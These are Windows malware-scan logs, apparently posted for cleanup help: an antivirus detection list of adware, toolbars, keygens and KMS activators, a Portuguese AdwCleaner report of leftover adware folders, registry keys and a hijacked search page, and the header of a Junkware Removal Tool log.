C:\Users\Helder\Downloads\PDFCreator-2_1_2-setup.exe Win32/InstallMonetizer.AQ potentially unwanted application,a variant of Win32/OpenCandy.A potentially unsafe application cleaned by deleting
C:\Users\Helder\Downloads\Driver\nvidia_nforce_mcp_89_lan_controller-driver.exe a variant of Win32/Auslogics.A potentially unwanted application cleaned by deleting
C:\Users\Helder\Downloads\Driver\Win38991-driver.exe a variant of Win32/Auslogics.A potentially unwanted application cleaned by deleting
C:\Windows\[email]KMS-R@1n.exe[/email] a variant of Win64/HackKMS.H potentially unsafe application cleaned by deleting
C:\Windows\[email]KMS-R@1nHook.dll[/email] a variant of Win64/HackKMS.D potentially unsafe application cleaned by deleting
C:\Windows\[email]KMS-R@1nHook.exe[/email] a variant of Win64/HackKMS.C potentially unsafe application cleaned by deleting
C:\Windows\SECOH-QAD.dll Win64/HackKMS.D potentially unsafe application cleaned by deleting
C:\Windows\SECOH-QAD.exe Win64/HackKMS.C potentially unsafe application cleaned by deleting
C:\Windows\Installer\39714.msi a variant of Win32/Adware.ELEX.HZ application deleted
C:\Windows\Installer\8d87dcb.msi a variant of Win64/Snarasite.A trojan deleted
C:\Windows\Installer\MSI255F.tmp a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application cleaned by deleting
C:\Windows\System32\drivers\legendasdrv.sys a variant of Win64/NetFilter.A potentially unsafe application cleaned by deleting (after the next restart)
C:\Windows\Temp\c60B5C4.tmp a variant of Win32/Adware.ELEX.HZ application cleaned by deleting
C:\Windows\Temp\tmp3DEA.tmp\QQBrowserFrame.dll Win32/ELEX.KM potentially unwanted application cleaned by deleting
C:\Windows\Temp\tmp3DEA.tmp\update.dll-201703221725.dll Win32/Adware.ELEX.IG application cleaned by deleting
C:\Windows\Temp\tmp3DEA.tmp\WinSnare.msi a variant of Win64/Snarasite.A trojan deleted
F:\Programas\aTubeCatcher.exe a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application,a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application cleaned by deleting
F:\Programas\BitTorrent.exe a variant of Win32/AdkDLLWrapper.A potentially unwanted application cleaned by deleting
F:\Programas\Caesium.exe a variant of MSIL/Solimba.AH potentially unwanted application cleaned by deleting
F:\Programas\PdfCreatorSetup.exe a variant of Win32/InstallCore.AFF.gen potentially unwanted application cleaned by deleting
F:\Programas\rcsetup153.exe Win32/Bundled.Toolbar.Google.D potentially unsafe application cleaned by deleting
F:\Programas\Corel X7\Corel Draw X7 64 bits CRACKEADO 2016 [CANAL TUDO CRACKEADO].rar a variant of Win32/Keygen.PE potentially unsafe application deleted
F:\Programas\Corel X8\CorelDRAW Graphics Suite X8 18.0.0.448 Multilingual + Keygen [SadeemPC].zip a variant of Win32/Keygen.PE potentially unsafe application deleted
F:\Programas\File View Pro\Keygen v5\Setup.exe a variant of Win32/Amonetize.BW potentially unwanted application,Win32/OutBrowse.X potentially unwanted application deleted
F:\Programas\Office 2013 - 64 bits\Ativador\AtvDR Win 8.1 - DICAS GEEK (1).zip MSIL/HackTool.IdleKMS.C potentially unsafe application,a variant of MSIL/HackTool.IdleKMS.C potentially unsafe application deleted
F:\Programas\Office 2013 - 64 bits\Ativador\AtvDR Win 8.1 - DICAS GEEK\KMSpico - Geek Dicas.exe MSIL/HackTool.IdleKMS.C potentially unsafe application,a variant of MSIL/HackTool.IdleKMS.C potentially unsafe application cleaned by deleting
F:\Programas\Office 2013 - 64 bits\Ativador 2\Ativ. OFF2013 [ArphaNET].rar a variant of MSIL/HackKMS.G potentially unsafe application deleted
F:\Programas\Office 2013 - 64 bits\Ativador 2\Ativador Office 2013 [ArphaNET]\ARQUIVOS\Microsoft Toolkit 2.5.2.exe a variant of MSIL/HackKMS.G potentially unsafe application cleaned by deleting
F:\Programas\Office 2013 - 64 bits\Ativador 2\Ativador Office 2013 [ArphaNET]\ARQUIVOS\Microsoft Toolkit 2.5.2.rar a variant of MSIL/HackKMS.G potentially unsafe application deleted
F:\Programas\Office 2016\Ativadores Office.exe multiple threats,a variant of Win32/HackKMS.N potentially unsafe application,a variant of Win32/HackKMS.AI potentially unsafe application,Win32/HackKMS.AB potentially unsafe application,Win64/HackKMS.C potentially unsafe application,a variant of Win32/HackKMS.Z potentially unsafe application,Win32/HackKMS.Z potentially unsafe application,Win64/HackKMS.A trojan,Win32/HackKMS.L trojan,a variant of Win32/HackKMS.S potentially unsafe application,a variant of Win32/HackKMS.AN potentially unsafe application,a variant of Win64/HackKMS.J potentially unsafe application,a variant of MSIL/HackKMS.I potentially unsafe application,a variant of Win32/HackTool.KMSAuto.E potentially unsafe application,a variant of MSIL/HackTool.IdleKMS.E potentially unsafe application,MSIL/HackTool.IdleKMS.I potentially unsafe application,a variant of MSIL/HackTool.WinActivator.J potentially unsafe application cleaned by deleting
F:\Programas\Office 2016\Office 2016.exe a variant of Win32/OpenCandy.A potentially unsafe application cleaned by deleting
F:\Programas\Office 2016\Ativadores\KMS autonet\Ativador KMSAuto Net.exe a variant of MSIL/HackKMS.I potentially unsafe application cleaned by deleting
F:\Programas\Office 2016\Ativadores\KMSpico\KMSpico_setup.exe a variant of MSIL/HackTool.IdleKMS.E potentially unsafe application,MSIL/HackTool.IdleKMS.I potentially unsafe application cleaned by deleting
F:\Programas\Office 2016\Mais novo\KMSAuto.exe a variant of Win32/HackKMS.Q potentially unsafe application cleaned by deleting
F:\Programas\Office 2016\Office Professional Plus 2016 x86-x64\Ativador 1\Office 2016 KMS Activator Ultimate v1.1 Final Setup.exe a variant of MSIL/Riskware.HackAV.S application cleaned by deleting
F:\Programas\Office 2016\Office Professional Plus 2016 x86-x64\Ativador 2\KMSpico 10.1.5.exe a variant of MSIL/HackTool.IdleKMS.E potentially unsafe application cleaned by deleting
F:\Programas\Office 2016\Pacote\uTorrent\App\uTorrent\uTorrent.exe a variant of Win32/OpenCandy.A potentially unsafe application cleaned by deleting
F:\Programas\Office 2016\Pacote\uTorrent\App\uTorrent\updates\3.4.3_40298.exe a variant of Win32/OpenCandy.A potentially unsafe application cleaned by deleting
F:\Programas\Piriform Recuva Professional v1.51.1063 +Keys\rcsetup151.exe Win32/Bundled.Toolbar.Google.D potentially unsafe application cleaned by deleting

# AdwCleaner v6.044 - Relatório criado 23/03/2017 às 09:20:06
# Atualizado em 28/02/2017 por Malwarebytes
# Banco de dados : 2017-03-23.1 [Servidor]
# Sistema operacional : Windows 10 Home Single Language (X64)
# Usuário : Helder - HELDER
# Executando de : F:\Programas\adwcleaner_6.044.exe
# Modo: Digitalizar
# Apoio : https://www.malwarebytes.com/support

***** [ Serviços ] *****
Serviço Encontrado: YSearchUtilSvc

***** [ Pastas ] *****
Pasta Encontrada: C:\Users\Helder\AppData\Local\11499
Pasta Encontrada: C:\Users\Helder\AppData\Local\globalUpdate
Pasta Encontrada: C:\Users\Helder\AppData\Local\YSearchUtil
Pasta Encontrada: C:\Users\Helder\AppData\LocalLow\Speedbit
Pasta Encontrada: C:\Users\Helder\AppData\LocalLow\Toolbar4
Pasta Encontrada: C:\Users\Helder\AppData\Roaming\aMule
Pasta Encontrada: C:\Users\Helder\AppData\Local\VirtualStore\Program Files (x86)\Mobogenie
Pasta Encontrada: C:\ProgramData\apn
Pasta Encontrada: C:\ProgramData\Speedbit
Pasta Encontrada: C:\ProgramData\Auslogics
Pasta Encontrada: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics
Pasta Encontrada: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hotspot
Pasta Encontrada: C:\Users\Public\Documents\Speedbit
Pasta Encontrada: C:\Program Files (x86)\globalUpdate
Pasta Encontrada: C:\Program Files (x86)\predm
Pasta Encontrada: C:\Program Files (x86)\XTab
Pasta Encontrada: C:\Program Files (x86)\Yahoo!\yset
Pasta Encontrada: C:\Program Files (x86)\Auslogics
Pasta Encontrada: C:\Program Files (x86)\deskapp
Pasta Encontrada: C:\Program Files (x86)\Common Files\Speedbit
Pasta Encontrada: C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil

***** [ Arquivos ] *****
Arquivo encontrado: C:\WINDOWS\SysNative\log\iSafeKrnlCall.log
Arquivo encontrado: C:\ProgramData\Duplicaterecord.js
Arquivo encontrado: C:\Users\Public\Documents\temp.dat
Arquivo encontrado: C:\Users\Public\Documents\report.dat

***** [ DLL ] *****
Não foram encontradas DLLs mal-intencionadas.

***** [ WMI ] *****
Nenhuma chave mal-intencionada encontrada.

***** [ Atalhos ] *****
Nenhum atalho infectado encontrado.

***** [ Atividades agendadas ] *****
Tarefa Encontrada: pcdeventlaunchertask

***** [ Registro ] *****
Chave encontrada: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\PicexaService
Chave encontrada: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\PicexaService
Chave encontrada: HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF
Chave encontrada: HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg
Chave encontrada: HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1
Chave encontrada: HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2
Chave encontrada: HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1
Chave encontrada: [x64] HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF
Chave encontrada: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg
Chave encontrada: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1
Chave encontrada: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2
Chave encontrada: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1
Chave encontrada: HKLM\SOFTWARE\Classes\AppID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Chave encontrada: HKCU\Software\Classes\CLSID\{BEBBC426-4F16-4567-8FE1-BE198C982027}
Chave encontrada: HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Chave encontrada: HKLM\SOFTWARE\Classes\CLSID\{44FC7A33-2E5C-48DC-B6F5-B81E8005D122}
Chave encontrada: HKLM\SOFTWARE\Classes\CLSID\{997E3BFB-F821-411C-8B96-D61D415EC8FA}
Chave encontrada: HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Chave encontrada: HKLM\SOFTWARE\Classes\CLSID\{F4B8D46C-4EEE-401B-8607-DC03025F34B1}
Chave encontrada: HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
Chave encontrada: HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}
Chave encontrada: HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}
Chave encontrada: HKLM\SOFTWARE\Classes\CLSID\{99DCF141-03F9-4363-8D79-640FA646DEED}
Chave encontrada: HKLM\SOFTWARE\Classes\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{4897BBA6-48D9-468C-8EFA-846275D7701B}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{3AF4400F-CDC5-4F2D-B3F1-74348E5D5CCC}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{422E1393-7A4C-44FF-A7E1-8B9D146E0666}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{4807D6D8-ADC8-41AF-AB9D-AE1086D1E62F}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{6E1CD171-29C1-4D56-A223-E31C57A0A25A}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{70E96298-17FC-4020-A7CF-6F81ED8CF3AB}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{84A81B7E-B8CD-4891-BEA0-548D65E9610A}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{867DF9A9-D013-4A1A-B685-DFF65D225ED4}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{889074FC-1456-4CE8-88F7-154264DC275F}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{91F4CF02-F675-4E6A-B4E8-C13DF09B9B1B}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{A902A36E-0C79-4BD7-B561-9C058BD60210}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{AB778974-218E-4734-90F0-731BE7E50E77}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{ADE6A9C0-12B3-457D-9A86-548FA87E04DB}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{B7C67027-15EB-489F-A9EA-286076CF7540}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{CDB98856-BEA3-4073-AF57-23A3583AE9E4}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{CDED8922-BB3D-4E3A-9C2C-89B1C927F48B}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{D79CBD8E-D857-4D05-B3AD-26F722CF5B6E}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{E7EA7058-B19B-4A27-B50A-87A1B8FC5F30}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{0EE6D408-6ED5-40C6-8C42-A041D5DE9AB0}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{13A42355-1F94-4459-B19E-F60B2C607C77}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{293DD661-C540-4AC4-9B4C-42E68369CE1B}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{2EC58BDB-0694-4D54-80DD-A8F2AA0427A1}
Chave encontrada: HKLM\SOFTWARE\Classes\Interface\{313B508D-596D-4BDF-B0B5-E41F224E184A}
Chave encontrada: HKLM\SOFTWARE\Classes\TypeLib\{3BCF582D-CA87-4C6F-AF3D-B3548A976AB3}
Chave encontrada: HKLM\SOFTWARE\Classes\TypeLib\{4509D3CC-B642-4745-B030-645B79522C6D}
Chave encontrada: HKLM\SOFTWARE\Classes\TypeLib\{B87F8B63-7274-43FD-87FA-09D3B7496148}
Chave encontrada: HKLM\SOFTWARE\Classes\TypeLib\{C4BAE205-5E02-4E32-876E-F34B4E2D000C}
Chave encontrada: HKLM\SOFTWARE\Classes\TypeLib\{EC4085F2-8DB3-45A6-AD0B-CA289F3C5D7E}
Chave encontrada: HKLM\SOFTWARE\Classes\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}
Chave encontrada: HKLM\SOFTWARE\Classes\TypeLib\{FF7C3CE2-4B15-11D1-ABED-709549C10000}
Chave encontrada: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{0329E7D6-6F54-462D-93F6-F5C3118BADF2}
Chave encontrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{A18D16ED-27B2-4B83-B70C-15E73F099546}
Chave encontrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{BEE7E029-5037-4DAD-A2DB-82E397AB1A44}
Valor encontrado: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
Valor encontrado: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{51D26BB4-4D2C-4AE4-9873-5FF41B6DED1F}]
Chave encontrada: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\GlobalUpdate
Chave encontrada: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Reg\Clean
Chave encontrada: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\WajIEnhance
Chave encontrada: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\systweak
Chave encontrada: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\WinSnare
Chave encontrada: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\deskapp
Chave encontrada: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\SBConvert
Chave encontrada: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\SavePass 1.1
Chave encontrada: HKCU\Software\GlobalUpdate
Chave encontrada: HKCU\Software\Reg\Clean
Chave encontrada: HKCU\Software\WajIEnhance
Chave encontrada: HKCU\Software\systweak
Chave encontrada: HKCU\Software\WinSnare
Chave encontrada: HKCU\Software\deskapp
Chave encontrada: HKLM\SOFTWARE\hdcode
Chave encontrada: HKLM\SOFTWARE\jogotempo
Chave encontrada: HKLM\SOFTWARE\SpeedBit
Chave encontrada: HKLM\SOFTWARE\WindowsMangerProtect
Chave encontrada: HKLM\SOFTWARE\SkypeUpdateEx
Chave encontrada: HKLM\SOFTWARE\ScreenShot
Chave encontrada: HKLM\SOFTWARE\amule-custom
Chave encontrada: HKLM\SOFTWARE\Socia2Sear
Chave encontrada: HKLM\SOFTWARE\Auslogics
Chave encontrada: HKLM\SOFTWARE\msServer
Chave encontrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! SearchSet
Chave encontrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Software Deals_is1
Chave encontrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{59B5A9CD-253D-4C41-A073-B387D4C9672D}
Chave encontrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13D7C2E9-08E7-4889-94FF-87E707184E53}
Chave encontrada: [x64] HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\SBConvert
Chave encontrada: [x64] HKCU\Software\GlobalUpdate
Chave encontrada: [x64] HKCU\Software\Reg\Clean
Chave encontrada: [x64] HKCU\Software\WajIEnhance
Chave encontrada: [x64] HKCU\Software\systweak
Chave encontrada: [x64] HKCU\Software\WinSnare
Chave encontrada: [x64] HKCU\Software\deskapp
Chave encontrada: [x64] HKLM\SOFTWARE\Socia2Sear
Chave encontrada: [x64] HKLM\SOFTWARE\InterSect Alliance
Chave encontrada: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\649A52D257CA5DB4EAAE8BA9EB23E467
Dados encontrados: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Microsoft\Internet Explorer\Main [Search Page] - hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zcc
Dados encontrados: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.startpageing123.com/?type=hp&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccae
Dados encontrados: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Microsoft\Internet Explorer\Main [Default_Search_URL] - hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281d
Dados encontrados: HKCU\Software\Microsoft\Internet Explorer\Main [Search Page] - hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-
Dados encontrados: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.startpageing123.com/?type=hp&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M7
Dados encontrados: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Search_URL] - hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM
Dados encontrados: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Search Page] - hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XH
Dados encontrados: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.startpageing123.com/?type=hp&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-
Dados encontrados: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Search_URL] - hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750
Chave encontrada: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
Dados encontrados: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Chave encontrada: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
Dados encontrados: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Chave encontrada: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
Dados encontrados: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Chave encontrada: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\piroga.space
Chave encontrada: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\softonic.com.br
Chave encontrada: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\solvusoft.com
Chave encontrada: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.softonic.com.
Chave encontrada: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.solvusoft.com
Chave encontrada: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\piroga.space
Chave encontrada: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\softonic.com.br
Chave encontrada: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\solvusoft.com
Chave encontrada: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.softonic.com.br
Chave encontrada: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.solvusoft.com
Chave encontrada: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\piroga.space
Chave encontrada: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\softonic.com.br
Chave encontrada: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\solvusoft.com
Chave encontrada: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.softonic.co
Chave encontrada: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.solvusoft.c
Chave encontrada: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\piroga.space
Chave encontrada: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\softonic.com.br
Chave encontrada: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\solvusoft.com
Chave encontrada: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.softonic.com.b
Chave encontrada: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.solvusoft.com
Chave encontrada: HKLM\SOFTWARE\Classes\AppID\TbCommonUtils.DLL
Chave encontrada: HKLM\SOFTWARE\Classes\AppID\TbHelper.EXE
Chave encontrada: HKLM\SOFTWARE\Classes\MIME\Database\Content Type\application/x-vnd.ssliveupdate.oneclickctrl.9
Chave encontrada: HKLM\SOFTWARE\Classes\MIME\Database\Content Type\application/x-vnd.ssliveupdate.update3webcontrol.3
Chave encontrada: HKLM\SOFTWARE\Classes\Record\{425E7597-03A2-338D-B72A-0E51FFE77A7E}
Chave encontrada: HKLM\SOFTWARE\Classes\Record\{915BB7D5-082E-3B91-B1E0-45B5FDE01F24}
Chave encontrada: HKLM\SOFTWARE\Classes\Record\{2009AF2F-5786-3067-8799-B97F7832FDD6}
Chave encontrada: HKLM\SOFTWARE\Classes\Record\{FB2E65F4-5687-33EF-9BBF-4E3C9C98D3B9}
Chave encontrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Mobogenie.exe
Chave encontrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
Valor encontrado: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]

***** [ Navegadores ] *****
Nenhum item de navegador baseado em Firefox malicioso encontrado.
Chromium pref Encontrado: [C:\Users\Helder\AppData\Local\Google\Chrome\User Data\Default\Web data] - br.ask.com
*************************
C:\AdwCleaner\AdwCleaner[S0].txt - [19856 Bytes] - [23/03/2017 09:20:06]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [19930 Bytes] ##########

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.2 (03.10.2017)
Operating System: Windows 10 Home Single Language x64
Ran by Helder (Administrator) on 23/03/2017 at 10:14:14,29
